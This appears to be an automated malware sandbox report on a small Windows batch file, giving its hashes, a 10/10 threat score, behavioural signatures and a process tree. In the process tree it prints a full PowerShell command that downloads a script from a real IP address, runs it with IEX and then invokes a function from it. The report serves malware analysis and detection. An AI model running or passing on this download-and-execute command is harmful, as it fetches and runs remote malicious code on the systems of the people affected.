Analysis
-
max time kernel
132s -
max time network
152s -
platform
windows7_x64 -
resource
win7 -
submitted
29-08-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
703f05dca6cfaba3626152c6d4d1fcd6.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
703f05dca6cfaba3626152c6d4d1fcd6.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
703f05dca6cfaba3626152c6d4d1fcd6.bat
-
Size
220B
-
MD5
0a6ac1495b26f97102dc547e02722707
-
SHA1
a15c39e75f663c0e0ee152ac9c09541ffd6d1221
-
SHA256
25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585
-
SHA512
04b8fffa2dc6bb4b867392c307ae9472849b6872b8fca42568fec4ee07e76d09f41ff16007725b36a86ce3f45fabd6c5f86ac2ff26c71805cd11213bff539c2a
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1928 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1928 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1928 powershell.exe 1928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1928 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1516 wrote to memory of 1928 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1928 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1928 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 1928 1516 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\703f05dca6cfaba3626152c6d4d1fcd6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6');Invoke-EQAQDZNHEGRIN;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928